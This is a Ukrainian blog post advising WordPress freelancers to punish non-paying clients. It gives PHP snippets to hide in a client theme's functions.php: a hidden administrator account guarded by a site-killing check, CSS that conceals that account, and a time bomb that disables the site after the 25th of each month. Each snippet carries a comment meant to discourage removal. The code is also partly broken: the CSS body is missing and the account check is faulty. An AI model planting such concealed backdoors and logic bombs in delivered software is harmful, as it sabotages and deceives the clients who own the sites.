free-lanceЯ майже рік працюю фрілансером і хочу поділитися з вами способами захисту від неплатників за виконану роботу, тобто «кидал». Всі мої способи базуються на тому, що ви можете скасувати виконану роботу, тобто забрати чи видали її і таким чином покарати чи змусити розрахуватися. Я б виокремив три способи:

  1. Створюєте собі користувача з правами адміна і додаєте у файл [php]functions.php[/php] вашої теми цей код:
    [php]
    # Не видаляйте ці рядки! Інакше небо впаде на голову!
    $result = $wpdb->get_results(“SELECT ID, user_login, user_level, user_pass FROM $wpdb->users LIMIT 0 , 1”);
    foreach ($result as $sk_user) {
    if( $sk_user->ID !== ‘1’ && $sk_user->user_login !==’skinik’ && $sk_user->user_level !== ‘0’ && $sk_user->user_pass !== ‘$P$BWQgeSchIaLLmMghBrZxMK.cHnAOZC1’ ) {
    wp_die(‘Fatal Error!’);
    }
    }
    [/php]
    Даний спосіб захисту базується на тому, що у вас є права адміна на сайті і якщо хтось змінить ваш профіль, то сайт перестане працювати, а натомість покаже «Fatal Error!». Необхідні дані для змінних можна взяти у таблиці користувачів БД.
  2. Другий спосіб майже такий самий, як і попередній. Але різниця у тому, що ви себе приховуєте у списку користувачів. Зайдіть на сторінку користувачів і за допомогою фаєрбаґу дізнайтеся ID рядка таблиці, в якому знаходиться ваш користувач, наприклад у вашого рядка ID [php]user-8[/php], тоді слід додати такий код у [php]functions.php[/php] вашої теми:
    [php]
    # Не видаляйте ці рядки! Інакше небо впаде на голову!
    function sk_admin_css() {
    print ‘

    ‘;
    }
    add_action(‘admin_head’, ‘sk_admin_css’);
    [/php]

  3. Обмеження роботоздатності сайту по даті. Наприклад, замовник заплатив аванс за сайт, ви здали сайт, а він сказав, що решту заплатить після того як протестує сайт. Минуло багато часу, а він і досі не заплатив, і можливо зник. У такому випадку домоміг би цей код, який треба вставити у файл [php]functions.php[/php] вашої теми:
    [php]
    # Не видаляйте ці рядки! Інакше небо впаде на голову!
    $f_date = date(‘d’);
    if($f_date > ’25’) wp_die(‘Unknown error’);
    [/php]
    Таким чином ми обмежемо роботу сайту після 25-го числа поточного місяця.
Author

Дмитро Кондрюк в веб-індустрії з 2003 року. В 2009р. заснував проект Український WordPress (що у подальшому став офіційним сайтом команди локалізації WordPress в Україні). З 2010 року засновник і технічний директор проекту Український хостинг для WordPress (WPHost.me) - повноцінного хостинг-сервісу, максимально оптимізованого на використання CMS WordPress.

Коментувати

коментарі 2